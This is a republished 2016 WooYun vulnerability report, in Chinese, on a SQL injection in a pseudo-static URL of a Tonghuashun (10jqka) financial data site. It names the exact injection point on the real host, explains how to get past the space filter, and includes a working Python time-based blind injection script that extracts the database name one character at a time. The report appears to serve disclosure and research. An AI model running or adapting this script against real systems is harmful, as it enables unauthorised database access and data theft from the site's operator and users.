同花顺某站伪静态SQL注入（附验证脚本）

admin

142171
文章

117
评论

2017年3月17日22:07:56评论225 views字数 230阅读0分46秒阅读模式

摘要

2016-03-15：细节已通知厂商并且等待厂商处理中
2016-03-15：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-03-20：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(23) 关注此漏洞

缺陷编号： WooYun-2016-184816

漏洞标题：同花顺某站伪静态SQL注入（附验证脚本）

漏洞作者： null_z

提交时间： 2016-03-15 09:27

公开时间： 2016-03-20 09:30

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+字符类型注射 Mysql

11人收藏

漏洞详情

披露状态：

简要描述：

。。。

详细说明：

注入点 http://data.10jqka.com.cn/ifyyb/yybstockxt/code/600811/date/1*

注入参数打星号的位置

过滤了空格用＋号代替，注意缓存。

True

False

漏洞证明：

版本 5.5.27

数据库 datacenfer

code 区域

#!/usr/bin/env python
 #-*-coding:utf-8-*-
 
 
 import string
 import requests
 import time
 
 
 payloads = string.ascii_lowercase + string.digits + '_@. '
 res = ''
 headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.69 Safari/537.36'}
 
 for i in range(1, 20):
  for p in payloads:
   start_time = time.time()
   url = "http://data.10jqka.com.cn/ifyyb/yybstockxt/code/600811/date/1'+if((now()=sysdate())-(mid(database(),{},1)='{}'),1,sleep(1*3))+'1".format(i, p)
   req = requests.get(url)
   print req.url
   if time.time() - start_time > 3:
    res = res + p
    print "/n" + res + "/n"
    break
 print "/n/n[Finish]: " + res

修复方案：

。。。

版权声明：转载请注明来源 null_z@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-03-20 09:30

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-23 14:35 | 闰土。 ( 路人 | Rank:6 漏洞数:3 | 做自己的英雄 - rainto .)

1

mark !

1# 回复此人

漏洞概要 关注数(23) 关注此漏洞